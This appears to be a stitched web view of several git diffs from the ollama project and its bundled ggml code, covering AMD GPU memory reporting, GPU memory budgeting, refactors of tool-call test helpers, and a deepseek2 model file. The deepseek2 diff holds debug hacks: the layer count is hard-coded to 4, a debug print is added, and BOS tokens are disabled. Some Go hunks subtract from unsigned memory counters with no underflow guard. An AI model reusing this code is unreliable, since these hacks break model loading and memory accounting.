index 5349bce24..0103fd03a 100644 index 5349bce24..d43d46d1d 100644
--- a/ggml/src/ggml-vulkan/ggml-vulkan.cpp --- a/ggml/src/ggml-vulkan/ggml-vulkan.cpp
+++ b/ggml/src/ggml-vulkan/ggml-vulkan.cpp +++ b/ggml/src/ggml-vulkan/ggml-vulkan.cpp
@@ -236,6 +236,7 @@ class vk_memory_logger; @@ -236,6 +236,7 @@ class vk_memory_logger;
@ -334,7 +334,7 @@ index 5349bce24..0103fd03a 100644
+ switch (props2.properties.vendorID) { + switch (props2.properties.vendorID) {
+ case VK_VENDOR_ID_AMD: + case VK_VENDOR_ID_AMD:
+ if (ggml_hip_mgmt_init() == 0) { + if (ggml_hip_mgmt_init() == 0) {
+ int status = ggml_hip_get_device_memory(ctx->pci_id != "" ? ctx->pci_id.c_str() : ctx->uuid.c_str(), free, total, ctx->is_integrated_gpu); + int status = ggml_hip_get_device_memory(ctx->pci_id != "" ? ctx->pci_id.c_str() : ctx->uuid.c_str(), free, total);
+ if (status == 0) { + if (status == 0) {
+ GGML_LOG_DEBUG("%s device %s utilizing AMD specific memory reporting free: %zu total: %zu\n", __func__, ctx->pci_id != "" ? ctx->pci_id.c_str() : ctx->uuid.c_str(), *free, *total); + GGML_LOG_DEBUG("%s device %s utilizing AMD specific memory reporting free: %zu total: %zu\n", __func__, ctx->pci_id != "" ? ctx->pci_id.c_str() : ctx->uuid.c_str(), *free, *total);
+ ggml_hip_mgmt_release(); + ggml_hip_mgmt_release();
@ -505,10 +505,10 @@ index 5349bce24..0103fd03a 100644
} }
diff --git a/ggml/src/mem_hip.cpp b/ggml/src/mem_hip.cpp diff --git a/ggml/src/mem_hip.cpp b/ggml/src/mem_hip.cpp
new file mode 100644 new file mode 100644
index 000000000..23c765806 index 000000000..c1949b899
--- /dev/null --- /dev/null
+++ b/ggml/src/mem_hip.cpp +++ b/ggml/src/mem_hip.cpp
@@ -0,0 +1,558 @@ @@ -0,0 +1,529 @@
+#include "ggml.h" +#include "ggml.h"
+#include "ggml-impl.h" +#include "ggml-impl.h"
+ +
@ -842,7 +842,7 @@ index 000000000..23c765806
+ if (gpus != NULL) gpus->pVtbl->Release(gpus); \ + if (gpus != NULL) gpus->pVtbl->Release(gpus); \
+ if (gpu != NULL) gpu->pVtbl->Release(gpu) + if (gpu != NULL) gpu->pVtbl->Release(gpu)
+ +
+int ggml_hip_get_device_memory(const char *id, size_t *free, size_t *total, bool is_integrated_gpu) { +int ggml_hip_get_device_memory(const char *id, size_t *free, size_t *total) {
+ std::lock_guard<std::mutex> lock(ggml_adlx_lock); + std::lock_guard<std::mutex> lock(ggml_adlx_lock);
+ if (adlx.handle == NULL) { + if (adlx.handle == NULL) {
+ GGML_LOG_INFO("%s ADLX was not initialized\n", __func__); + GGML_LOG_INFO("%s ADLX was not initialized\n", __func__);
@ -966,16 +966,13 @@ index 000000000..23c765806
+ return 0; + return 0;
+} +}
+void ggml_hip_mgmt_release() {} +void ggml_hip_mgmt_release() {}
+int ggml_hip_get_device_memory(const char *id, size_t *free, size_t *total, bool is_integrated_gpu) { +int ggml_hip_get_device_memory(const char *id, size_t *free, size_t *total) {
+ GGML_LOG_INFO("%s searching for device %s\n", __func__, id); + GGML_LOG_INFO("%s searching for device %s\n", __func__, id);
+ const std::string drmDeviceGlob = "/sys/class/drm/card*/device/uevent"; + const std::string drmDeviceGlob = "/sys/class/drm/card*/device/uevent";
+ const std::string drmTotalMemoryFile = "mem_info_vram_total"; + const std::string drmTotalMemoryFile = "mem_info_vram_total";
+ const std::string drmUsedMemoryFile = "mem_info_vram_used"; + const std::string drmUsedMemoryFile = "mem_info_vram_used";
+ const std::string drmGTTTotalMemoryFile = "mem_info_gtt_total";
+ const std::string drmGTTUsedMemoryFile = "mem_info_gtt_used";
+ const std::string drmUeventPCISlotLabel = "PCI_SLOT_NAME="; + const std::string drmUeventPCISlotLabel = "PCI_SLOT_NAME=";
+ +
+
+ glob_t glob_result; + glob_t glob_result;
+ glob(drmDeviceGlob.c_str(), GLOB_NOSORT, NULL, &glob_result); + glob(drmDeviceGlob.c_str(), GLOB_NOSORT, NULL, &glob_result);
+ +
@ -1009,6 +1006,7 @@ index 000000000..23c765806
+ +
+ uint64_t memory; + uint64_t memory;
+ totalFileStream >> memory; + totalFileStream >> memory;
+ *total = memory;
+ +
+ std::string usedFile = dir + "/" + drmUsedMemoryFile; + std::string usedFile = dir + "/" + drmUsedMemoryFile;
+ std::ifstream usedFileStream(usedFile.c_str()); + std::ifstream usedFileStream(usedFile.c_str());
@ -1021,33 +1019,6 @@ index 000000000..23c765806
+ +
+ uint64_t memoryUsed; + uint64_t memoryUsed;
+ usedFileStream >> memoryUsed; + usedFileStream >> memoryUsed;
+
+ if (is_integrated_gpu) {
+ std::string totalFile = dir + "/" + drmGTTTotalMemoryFile;
+ std::ifstream totalFileStream(totalFile.c_str());
+ if (!totalFileStream.is_open()) {
+ GGML_LOG_DEBUG("%s Failed to read sysfs node %s\n", __func__, totalFile.c_str());
+ file.close();
+ globfree(&glob_result);
+ return 1;
+ }
+ uint64_t gtt;
+ totalFileStream >> gtt;
+ std::string usedFile = dir + "/" + drmGTTUsedMemoryFile;
+ std::ifstream usedFileStream(usedFile.c_str());
+ if (!usedFileStream.is_open()) {
+ GGML_LOG_DEBUG("%s Failed to read sysfs node %s\n", __func__, usedFile.c_str());
+ file.close();
+ globfree(&glob_result);
+ return 1;
+ }
+ uint64_t gttUsed;
+ usedFileStream >> gttUsed;
+ memory += gtt;
+ memoryUsed += gttUsed;
+ }
+
+ *total = memory;
+ *free = memory - memoryUsed; + *free = memory - memoryUsed;
+ +
+ file.close(); + file.close();

View File

@ -24,12 +24,12 @@ index 99ae293cc..9a134b7af 100644
set_target_properties(ggml-base PROPERTIES set_target_properties(ggml-base PROPERTIES
diff --git a/ggml/src/ggml-impl.h b/ggml/src/ggml-impl.h diff --git a/ggml/src/ggml-impl.h b/ggml/src/ggml-impl.h
index dba8f4695..7e17032c7 100644 index 1c07e767a..0da3e065b 100644
--- a/ggml/src/ggml-impl.h --- a/ggml/src/ggml-impl.h
+++ b/ggml/src/ggml-impl.h +++ b/ggml/src/ggml-impl.h
@@ -684,6 +684,9 @@ GGML_API void ggml_nvml_release(); @@ -684,6 +684,9 @@ GGML_API void ggml_nvml_release();
GGML_API int ggml_hip_mgmt_init(); GGML_API int ggml_hip_mgmt_init();
GGML_API int ggml_hip_get_device_memory(const char *id, size_t *free, size_t *total, bool is_integrated_gpu); GGML_API int ggml_hip_get_device_memory(const char *id, size_t *free, size_t *total);
GGML_API void ggml_hip_mgmt_release(); GGML_API void ggml_hip_mgmt_release();
+GGML_API int ggml_dxgi_pdh_init(); +GGML_API int ggml_dxgi_pdh_init();
+GGML_API int ggml_dxgi_pdh_get_device_memory(const char* luid, size_t *free, size_t *total, bool is_integrated_gpu); +GGML_API int ggml_dxgi_pdh_get_device_memory(const char* luid, size_t *free, size_t *total, bool is_integrated_gpu);
@ -38,7 +38,7 @@ index dba8f4695..7e17032c7 100644
#ifdef __cplusplus #ifdef __cplusplus
} }
diff --git a/ggml/src/ggml-vulkan/ggml-vulkan.cpp b/ggml/src/ggml-vulkan/ggml-vulkan.cpp diff --git a/ggml/src/ggml-vulkan/ggml-vulkan.cpp b/ggml/src/ggml-vulkan/ggml-vulkan.cpp
index 0103fd03a..9cc4ebdef 100644 index d43d46d1d..df79f9f79 100644
--- a/ggml/src/ggml-vulkan/ggml-vulkan.cpp --- a/ggml/src/ggml-vulkan/ggml-vulkan.cpp
+++ b/ggml/src/ggml-vulkan/ggml-vulkan.cpp +++ b/ggml/src/ggml-vulkan/ggml-vulkan.cpp
@@ -74,6 +74,7 @@ DispatchLoaderDynamic & ggml_vk_default_dispatcher(); @@ -74,6 +74,7 @@ DispatchLoaderDynamic & ggml_vk_default_dispatcher();

View File

@ -10,7 +10,7 @@ fallback to cpu
1 file changed, 3 insertions(+) 1 file changed, 3 insertions(+)
diff --git a/ggml/src/ggml-cuda/ggml-cuda.cu b/ggml/src/ggml-cuda/ggml-cuda.cu diff --git a/ggml/src/ggml-cuda/ggml-cuda.cu b/ggml/src/ggml-cuda/ggml-cuda.cu
index 334a30135..5c9dfd032 100644 index 48cdb1dcf..3102d7ea7 100644
--- a/ggml/src/ggml-cuda/ggml-cuda.cu --- a/ggml/src/ggml-cuda/ggml-cuda.cu
+++ b/ggml/src/ggml-cuda/ggml-cuda.cu +++ b/ggml/src/ggml-cuda/ggml-cuda.cu
@@ -4633,6 +4633,9 @@ static bool ggml_backend_cuda_device_supports_op(ggml_backend_dev_t dev, const g @@ -4633,6 +4633,9 @@ static bool ggml_backend_cuda_device_supports_op(ggml_backend_dev_t dev, const g

View File

@ -524,13 +524,8 @@ func (s *llamaServer) Load(ctx context.Context, systemInfo ml.SystemInfo, system
// Use the size of one layer as a buffer // Use the size of one layer as a buffer
layers := s.ggml.Tensors().GroupLayers() layers := s.ggml.Tensors().GroupLayers()
if blk0, ok := layers["blk.0"]; ok { if blk0, ok := layers["blk.0"]; ok {
buffer := blk0.Size() + kv[0]
for i := range gpus { for i := range gpus {
if gpus[i].FreeMemory > buffer { gpus[i].FreeMemory -= blk0.Size() + kv[0]
gpus[i].FreeMemory -= buffer
} else {
gpus[i].FreeMemory = 0
}
} }
} else { } else {
slog.Warn("model missing blk.0 layer size") slog.Warn("model missing blk.0 layer size")
@ -580,11 +575,7 @@ func (s *llamaServer) Load(ctx context.Context, systemInfo ml.SystemInfo, system
projectorGPU = firstIntegrated projectorGPU = firstIntegrated
} }
if gpus[projectorGPU].FreeMemory > projectorWeights { gpus[projectorGPU].FreeMemory -= projectorWeights
gpus[projectorGPU].FreeMemory -= projectorWeights
} else {
gpus[projectorGPU].FreeMemory = 0
}
} }
var kvTotal uint64 var kvTotal uint64

View File

@ -19,40 +19,6 @@ import (
"github.com/ollama/ollama/openai" "github.com/ollama/ollama/openai"
) )
// testPropsMap creates a ToolPropertiesMap from a map (convenience function for tests)
func testPropsMap(m map[string]api.ToolProperty) *api.ToolPropertiesMap {
props := api.NewToolPropertiesMap()
for k, v := range m {
props.Set(k, v)
}
return props
}
// testArgs creates ToolCallFunctionArguments from a map (convenience function for tests)
func testArgs(m map[string]any) api.ToolCallFunctionArguments {
args := api.NewToolCallFunctionArguments()
for k, v := range m {
args.Set(k, v)
}
return args
}
// argsComparer provides cmp options for comparing ToolCallFunctionArguments by value
var argsComparer = cmp.Comparer(func(a, b api.ToolCallFunctionArguments) bool {
return cmp.Equal(a.ToMap(), b.ToMap())
})
// propsComparer provides cmp options for comparing ToolPropertiesMap by value
var propsComparer = cmp.Comparer(func(a, b *api.ToolPropertiesMap) bool {
if a == nil && b == nil {
return true
}
if a == nil || b == nil {
return false
}
return cmp.Equal(a.ToMap(), b.ToMap())
})
const ( const (
prefix = `data:image/jpeg;base64,` prefix = `data:image/jpeg;base64,`
image = `iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNk+A8AAQUBAScY42YAAAAASUVORK5CYII=` image = `iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNk+A8AAQUBAScY42YAAAAASUVORK5CYII=`
@ -255,10 +221,10 @@ func TestChatMiddleware(t *testing.T) {
ID: "id", ID: "id",
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_current_weather", Name: "get_current_weather",
Arguments: testArgs(map[string]any{ Arguments: map[string]any{
"location": "Paris, France", "location": "Paris, France",
"format": "celsius", "format": "celsius",
}), },
}, },
}, },
}, },
@ -295,10 +261,10 @@ func TestChatMiddleware(t *testing.T) {
ID: "id", ID: "id",
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_current_weather", Name: "get_current_weather",
Arguments: testArgs(map[string]any{ Arguments: map[string]any{
"location": "Paris, France", "location": "Paris, France",
"format": "celsius", "format": "celsius",
}), },
}, },
}, },
}, },
@ -334,10 +300,10 @@ func TestChatMiddleware(t *testing.T) {
ID: "id", ID: "id",
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_current_weather", Name: "get_current_weather",
Arguments: testArgs(map[string]any{ Arguments: map[string]any{
"location": "Paris, France", "location": "Paris, France",
"format": "celsius", "format": "celsius",
}), },
}, },
}, },
}, },
@ -374,10 +340,10 @@ func TestChatMiddleware(t *testing.T) {
ID: "id", ID: "id",
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_current_weather", Name: "get_current_weather",
Arguments: testArgs(map[string]any{ Arguments: map[string]any{
"location": "Paris, France", "location": "Paris, France",
"format": "celsius", "format": "celsius",
}), },
}, },
}, },
}, },
@ -414,10 +380,10 @@ func TestChatMiddleware(t *testing.T) {
ID: "id_abc", ID: "id_abc",
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_current_weather", Name: "get_current_weather",
Arguments: testArgs(map[string]any{ Arguments: map[string]any{
"location": "Paris, France", "location": "Paris, France",
"format": "celsius", "format": "celsius",
}), },
}, },
}, },
}, },
@ -460,10 +426,10 @@ func TestChatMiddleware(t *testing.T) {
ID: "id", ID: "id",
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_current_weather", Name: "get_current_weather",
Arguments: testArgs(map[string]any{ Arguments: map[string]any{
"location": "Paris, France", "location": "Paris, France",
"format": "celsius", "format": "celsius",
}), },
}, },
}, },
}, },
@ -528,7 +494,7 @@ func TestChatMiddleware(t *testing.T) {
Parameters: api.ToolFunctionParameters{ Parameters: api.ToolFunctionParameters{
Type: "object", Type: "object",
Required: []string{"location"}, Required: []string{"location"},
Properties: testPropsMap(map[string]api.ToolProperty{ Properties: map[string]api.ToolProperty{
"location": { "location": {
Type: api.PropertyType{"string"}, Type: api.PropertyType{"string"},
Description: "The city and state", Description: "The city and state",
@ -537,7 +503,7 @@ func TestChatMiddleware(t *testing.T) {
Type: api.PropertyType{"string"}, Type: api.PropertyType{"string"},
Enum: []any{"celsius", "fahrenheit"}, Enum: []any{"celsius", "fahrenheit"},
}, },
}), },
}, },
}, },
}, },
@ -592,7 +558,7 @@ func TestChatMiddleware(t *testing.T) {
} }
return return
} }
if diff := cmp.Diff(&tc.req, capturedRequest, argsComparer, propsComparer); diff != "" { if diff := cmp.Diff(&tc.req, capturedRequest); diff != "" {
t.Fatalf("requests did not match: %+v", diff) t.Fatalf("requests did not match: %+v", diff)
} }
if diff := cmp.Diff(tc.err, errResp); diff != "" { if diff := cmp.Diff(tc.err, errResp); diff != "" {

View File

@ -4436,7 +4436,7 @@ static void ggml_backend_cuda_device_get_memory(ggml_backend_dev_t dev, size_t *
#if defined(GGML_USE_HIP) #if defined(GGML_USE_HIP)
if (ggml_hip_mgmt_init() == 0) { if (ggml_hip_mgmt_init() == 0) {
int status = ggml_hip_get_device_memory(ctx->pci_bus_id.c_str(), free, total, ctx->integrated != 0); int status = ggml_hip_get_device_memory(ctx->pci_bus_id.c_str(), free, total);
if (status == 0) { if (status == 0) {
GGML_LOG_DEBUG("%s device %s utilizing AMD specific memory reporting free: %zu total: %zu\n", __func__, ctx->pci_bus_id.c_str(), *free, *total); GGML_LOG_DEBUG("%s device %s utilizing AMD specific memory reporting free: %zu total: %zu\n", __func__, ctx->pci_bus_id.c_str(), *free, *total);
ggml_hip_mgmt_release(); ggml_hip_mgmt_release();

View File

@ -682,7 +682,7 @@ GGML_API int ggml_nvml_init();
GGML_API int ggml_nvml_get_device_memory(const char *uuid, size_t *free, size_t *total); GGML_API int ggml_nvml_get_device_memory(const char *uuid, size_t *free, size_t *total);
GGML_API void ggml_nvml_release(); GGML_API void ggml_nvml_release();
GGML_API int ggml_hip_mgmt_init(); GGML_API int ggml_hip_mgmt_init();
GGML_API int ggml_hip_get_device_memory(const char *id, size_t *free, size_t *total, bool is_integrated_gpu); GGML_API int ggml_hip_get_device_memory(const char *id, size_t *free, size_t *total);
GGML_API void ggml_hip_mgmt_release(); GGML_API void ggml_hip_mgmt_release();
GGML_API int ggml_dxgi_pdh_init(); GGML_API int ggml_dxgi_pdh_init();
GGML_API int ggml_dxgi_pdh_get_device_memory(const char* luid, size_t *free, size_t *total, bool is_integrated_gpu); GGML_API int ggml_dxgi_pdh_get_device_memory(const char* luid, size_t *free, size_t *total, bool is_integrated_gpu);

View File

@ -13710,7 +13710,7 @@ void ggml_backend_vk_get_device_memory(ggml_backend_vk_device_context *ctx, size
switch (props2.properties.vendorID) { switch (props2.properties.vendorID) {
case VK_VENDOR_ID_AMD: case VK_VENDOR_ID_AMD:
if (ggml_hip_mgmt_init() == 0) { if (ggml_hip_mgmt_init() == 0) {
int status = ggml_hip_get_device_memory(ctx->pci_id != "" ? ctx->pci_id.c_str() : ctx->uuid.c_str(), free, total, ctx->is_integrated_gpu); int status = ggml_hip_get_device_memory(ctx->pci_id != "" ? ctx->pci_id.c_str() : ctx->uuid.c_str(), free, total);
if (status == 0) { if (status == 0) {
GGML_LOG_DEBUG("%s device %s utilizing AMD specific memory reporting free: %zu total: %zu\n", __func__, ctx->pci_id != "" ? ctx->pci_id.c_str() : ctx->uuid.c_str(), *free, *total); GGML_LOG_DEBUG("%s device %s utilizing AMD specific memory reporting free: %zu total: %zu\n", __func__, ctx->pci_id != "" ? ctx->pci_id.c_str() : ctx->uuid.c_str(), *free, *total);
ggml_hip_mgmt_release(); ggml_hip_mgmt_release();

View File

@ -331,7 +331,7 @@ void ggml_hip_mgmt_release() {
if (gpus != NULL) gpus->pVtbl->Release(gpus); \ if (gpus != NULL) gpus->pVtbl->Release(gpus); \
if (gpu != NULL) gpu->pVtbl->Release(gpu) if (gpu != NULL) gpu->pVtbl->Release(gpu)
int ggml_hip_get_device_memory(const char *id, size_t *free, size_t *total, bool is_integrated_gpu) { int ggml_hip_get_device_memory(const char *id, size_t *free, size_t *total) {
std::lock_guard<std::mutex> lock(ggml_adlx_lock); std::lock_guard<std::mutex> lock(ggml_adlx_lock);
if (adlx.handle == NULL) { if (adlx.handle == NULL) {
GGML_LOG_INFO("%s ADLX was not initialized\n", __func__); GGML_LOG_INFO("%s ADLX was not initialized\n", __func__);
@ -455,16 +455,13 @@ int ggml_hip_mgmt_init() {
return 0; return 0;
} }
void ggml_hip_mgmt_release() {} void ggml_hip_mgmt_release() {}
int ggml_hip_get_device_memory(const char *id, size_t *free, size_t *total, bool is_integrated_gpu) { int ggml_hip_get_device_memory(const char *id, size_t *free, size_t *total) {
GGML_LOG_INFO("%s searching for device %s\n", __func__, id); GGML_LOG_INFO("%s searching for device %s\n", __func__, id);
const std::string drmDeviceGlob = "/sys/class/drm/card*/device/uevent"; const std::string drmDeviceGlob = "/sys/class/drm/card*/device/uevent";
const std::string drmTotalMemoryFile = "mem_info_vram_total"; const std::string drmTotalMemoryFile = "mem_info_vram_total";
const std::string drmUsedMemoryFile = "mem_info_vram_used"; const std::string drmUsedMemoryFile = "mem_info_vram_used";
const std::string drmGTTTotalMemoryFile = "mem_info_gtt_total";
const std::string drmGTTUsedMemoryFile = "mem_info_gtt_used";
const std::string drmUeventPCISlotLabel = "PCI_SLOT_NAME="; const std::string drmUeventPCISlotLabel = "PCI_SLOT_NAME=";
glob_t glob_result; glob_t glob_result;
glob(drmDeviceGlob.c_str(), GLOB_NOSORT, NULL, &glob_result); glob(drmDeviceGlob.c_str(), GLOB_NOSORT, NULL, &glob_result);
@ -498,6 +495,7 @@ int ggml_hip_get_device_memory(const char *id, size_t *free, size_t *total, bool
uint64_t memory; uint64_t memory;
totalFileStream >> memory; totalFileStream >> memory;
*total = memory;
std::string usedFile = dir + "/" + drmUsedMemoryFile; std::string usedFile = dir + "/" + drmUsedMemoryFile;
std::ifstream usedFileStream(usedFile.c_str()); std::ifstream usedFileStream(usedFile.c_str());
@ -510,33 +508,6 @@ int ggml_hip_get_device_memory(const char *id, size_t *free, size_t *total, bool
uint64_t memoryUsed; uint64_t memoryUsed;
usedFileStream >> memoryUsed; usedFileStream >> memoryUsed;
if (is_integrated_gpu) {
std::string totalFile = dir + "/" + drmGTTTotalMemoryFile;
std::ifstream totalFileStream(totalFile.c_str());
if (!totalFileStream.is_open()) {
GGML_LOG_DEBUG("%s Failed to read sysfs node %s\n", __func__, totalFile.c_str());
file.close();
globfree(&glob_result);
return 1;
}
uint64_t gtt;
totalFileStream >> gtt;
std::string usedFile = dir + "/" + drmGTTUsedMemoryFile;
std::ifstream usedFileStream(usedFile.c_str());
if (!usedFileStream.is_open()) {
GGML_LOG_DEBUG("%s Failed to read sysfs node %s\n", __func__, usedFile.c_str());
file.close();
globfree(&glob_result);
return 1;
}
uint64_t gttUsed;
usedFileStream >> gttUsed;
memory += gtt;
memoryUsed += gttUsed;
}
*total = memory;
*free = memory - memoryUsed; *free = memory - memoryUsed;
file.close(); file.close();

View File

@ -4,6 +4,7 @@ package deepseek2
import ( import (
"cmp" "cmp"
"fmt"
"math" "math"
"github.com/ollama/ollama/fs" "github.com/ollama/ollama/fs"
@ -39,6 +40,10 @@ type Options struct {
ropeBase, ropeBase,
ropeScale float32 ropeScale float32
kqScale float64 kqScale float64
attentionTemperatureScale float32
attentionTemperatureLength int
attentionTemperatureFloorScale int
} }
func (o Options) applyRotaryPositionEmbeddings(ctx ml.Context, t, p ml.Tensor) ml.Tensor { func (o Options) applyRotaryPositionEmbeddings(ctx ml.Context, t, p ml.Tensor) ml.Tensor {
@ -66,7 +71,7 @@ type Attention struct {
Output *nn.Linear `gguf:"attn_out,alt:attn_output"` Output *nn.Linear `gguf:"attn_out,alt:attn_output"`
} }
func (attn *Attention) Forward(ctx ml.Context, hiddenStates, positions ml.Tensor, cache kvcache.Cache, opts *Options) ml.Tensor { func (attn *Attention) Forward(ctx ml.Context, hiddenStates, positions, attentionScales ml.Tensor, cache kvcache.Cache, opts *Options) ml.Tensor {
seqLength := hiddenStates.Dim(1) seqLength := hiddenStates.Dim(1)
var query ml.Tensor var query ml.Tensor
@ -104,6 +109,11 @@ func (attn *Attention) Forward(ctx ml.Context, hiddenStates, positions ml.Tensor
kRot = kRot.Repeat(ctx, 1, queryChunks[0].Dim(1)) kRot = kRot.Repeat(ctx, 1, queryChunks[0].Dim(1))
query = qRot.Concat(ctx, queryChunks[0], 0) query = qRot.Concat(ctx, queryChunks[0], 0)
key := kRot.Concat(ctx, kvChunks[0], 0) key := kRot.Concat(ctx, kvChunks[0], 0)
if attentionScales != nil {
query = query.Mul(ctx, attentionScales)
}
attention = nn.Attention(ctx, query, key, kvChunks[1], opts.kqScale, cache) attention = nn.Attention(ctx, query, key, kvChunks[1], opts.kqScale, cache)
} else { // v3.1 } else { // v3.1
qPass := queryChunks[0].Permute(ctx, 0, 2, 1, 3) qPass := queryChunks[0].Permute(ctx, 0, 2, 1, 3)
@ -115,6 +125,10 @@ func (attn *Attention) Forward(ctx ml.Context, hiddenStates, positions ml.Tensor
key := kRot.Concat(ctx, kPass, 0) key := kRot.Concat(ctx, kPass, 0)
value := kPass value := kPass
if attentionScales != nil {
query = query.Mul(ctx, attentionScales)
}
attention = nn.AttentionWithVMLA(ctx, query, key, value, nil, attn.VB.Weight, opts.kqScale, cache) attention = nn.AttentionWithVMLA(ctx, query, key, value, nil, attn.VB.Weight, opts.kqScale, cache)
} }
@ -201,10 +215,10 @@ type Layer struct {
MLP MLP MLP MLP
} }
func (t *Layer) Forward(ctx ml.Context, hiddenStates, positions, outputs ml.Tensor, cache kvcache.Cache, opts *Options) ml.Tensor { func (t *Layer) Forward(ctx ml.Context, hiddenStates, positions, attentionScales, outputs ml.Tensor, cache kvcache.Cache, opts *Options) ml.Tensor {
residual := hiddenStates residual := hiddenStates
hiddenStates = t.AttentionNorm.Forward(ctx, hiddenStates, opts.eps) hiddenStates = t.AttentionNorm.Forward(ctx, hiddenStates, opts.eps)
hiddenStates = t.Attention.Forward(ctx, hiddenStates, positions, cache, opts) hiddenStates = t.Attention.Forward(ctx, hiddenStates, positions, attentionScales, cache, opts)
if outputs != nil { if outputs != nil {
hiddenStates = hiddenStates.Rows(ctx, outputs) hiddenStates = hiddenStates.Rows(ctx, outputs)
@ -234,7 +248,11 @@ type Model struct {
} }
func New(c fs.Config) (model.Model, error) { func New(c fs.Config) (model.Model, error) {
layers := make([]Layer, c.Uint("block_count")) // layers := make([]Layer, c.Uint("block_count"))
// fmt.Printf("[MODEL DEBUG] Creating model with %d layers\n", c.Uint("block_count"))
layers := make([]Layer, 4)
fmt.Printf("[MODEL DEBUG] Creating model with %d layers\n", 4)
firstDenseLayerIndex := int(c.Uint("leading_dense_block_count")) firstDenseLayerIndex := int(c.Uint("leading_dense_block_count"))
for i := range layers { for i := range layers {
@ -261,6 +279,10 @@ func New(c fs.Config) (model.Model, error) {
`[一-龥぀-ゟ゠-ヿ]+`, `[一-龥぀-ゟ゠-ヿ]+`,
"[!\"#$%&'()*+,\\-./:;<=>?@\\[\\\\\\]^_`{|}~][A-Za-z]+|[^\r\n\\p{L}\\p{P}\\p{S}]?[\\p{L}\\p{M}]+| ?[\\p{P}\\p{S}]+[\r\n]*|\\s*[\r\n]+|\\s+(?!\\S)|\\s+", "[!\"#$%&'()*+,\\-./:;<=>?@\\[\\\\\\]^_`{|}~][A-Za-z]+|[^\r\n\\p{L}\\p{P}\\p{S}]?[\\p{L}\\p{M}]+| ?[\\p{P}\\p{S}]+[\r\n]*|\\s*[\r\n]+|\\s+(?!\\S)|\\s+",
} }
case "tekken":
pre = []string{
"[^\\r\\n\\p{L}\\p{N}]?((?=[\\p{L}])([^a-z]))*((?=[\\p{L}])([^A-Z]))+|[^\\r\\n\\p{L}\\p{N}]?((?=[\\p{L}])([^a-z]))+((?=[\\p{L}])([^A-Z]))*|\\p{N}| ?[^\\s\\p{L}\\p{N}]+[\\r\\n/]*|\\s*[\\r\\n]+|\\s+(?!\\S)|\\s+",
}
case "deepseek-llm": case "deepseek-llm":
// TODO: these models haven't been vetted so skip for now // TODO: these models haven't been vetted so skip for now
// pre = []string{ // pre = []string{
@ -276,13 +298,20 @@ func New(c fs.Config) (model.Model, error) {
return nil, model.ErrUnsupportedTokenizer return nil, model.ErrUnsupportedTokenizer
} }
// DEBUG: Check tokenizer vocabulary loading
tokens := c.Strings("tokenizer.ggml.tokens")
tokenTypes := c.Ints("tokenizer.ggml.token_type")
merges := c.Strings("tokenizer.ggml.merges")
// Debug output removed for performance
m := Model{ m := Model{
BytePairEncoding: model.NewBytePairEncoding( BytePairEncoding: model.NewBytePairEncoding(
&model.Vocabulary{ &model.Vocabulary{
Values: c.Strings("tokenizer.ggml.tokens"), Values: tokens,
Types: c.Ints("tokenizer.ggml.token_type"), Types: tokenTypes,
Merges: c.Strings("tokenizer.ggml.merges"), Merges: merges,
AddBOS: c.Bool("tokenizer.ggml.add_bos_token", true), AddBOS: false, // c.Bool("tokenizer.ggml.add_bos_token", true),
BOS: []int32{int32(c.Uint("tokenizer.ggml.bos_token_id"))}, BOS: []int32{int32(c.Uint("tokenizer.ggml.bos_token_id"))},
AddEOS: c.Bool("tokenizer.ggml.add_eos_token", false), AddEOS: c.Bool("tokenizer.ggml.add_eos_token", false),
EOS: append( EOS: append(
@ -316,6 +345,11 @@ func New(c fs.Config) (model.Model, error) {
routedScalingFactor: c.Float("expert_weights_scale"), routedScalingFactor: c.Float("expert_weights_scale"),
originalContextLength: int(c.Uint("rope.scaling.original_context_length")), originalContextLength: int(c.Uint("rope.scaling.original_context_length")),
// TODO: double check these values
attentionTemperatureScale: c.Float("attention.temperature_scale", 1.0),
attentionTemperatureLength: int(c.Uint("attention.temperature_length")),
attentionTemperatureFloorScale: int(c.Uint("attention.temperature_floor_scale", 8192)),
kqScale: kqScale, kqScale: kqScale,
}, },
} }
@ -331,8 +365,28 @@ func (m Model) Shift(ctx ml.Context, layer int, key, shift ml.Tensor) (ml.Tensor
func (m *Model) Forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) { func (m *Model) Forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) {
positions := ctx.Input().FromInts(batch.Positions, len(batch.Positions)) positions := ctx.Input().FromInts(batch.Positions, len(batch.Positions))
// DEBUG: Check TokenEmbedding initialization
if m.TokenEmbedding == nil {
panic("DEBUG: m.TokenEmbedding is nil - 'token_embd' tensor not found in GGUF")
}
hiddenStates := m.TokenEmbedding.Forward(ctx, batch.Inputs) hiddenStates := m.TokenEmbedding.Forward(ctx, batch.Inputs)
// Temperature tuning - used by mistral-large
var attentionScales ml.Tensor
if m.attentionTemperatureScale != 0.0 {
nTokens := len(batch.Positions)
scales := make([]float32, nTokens)
for i, pos := range batch.Positions {
posFloat := float64(pos)
scaleValue := math.Log(math.Floor((posFloat+1.0)/float64(m.attentionTemperatureFloorScale))+1.0)*float64(m.attentionTemperatureScale) + 1.0
scales[i] = float32(scaleValue)
}
attentionScales = ctx.Input().FromFloats(scales, 1, 1, nTokens)
}
for i, layer := range m.Layers { for i, layer := range m.Layers {
m.Cache.SetLayer(i) m.Cache.SetLayer(i)
@ -341,7 +395,7 @@ func (m *Model) Forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) {
outputs = batch.Outputs outputs = batch.Outputs
} }
hiddenStates = layer.Forward(ctx, hiddenStates, positions, outputs, m.Cache, m.Options) hiddenStates = layer.Forward(ctx, hiddenStates, positions, attentionScales, outputs, m.Cache, m.Options)
} }
hiddenStates = m.OutputNorm.Forward(ctx, hiddenStates, m.eps) hiddenStates = m.OutputNorm.Forward(ctx, hiddenStates, m.eps)

View File

@ -40,9 +40,9 @@ func TestCogitoParser(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
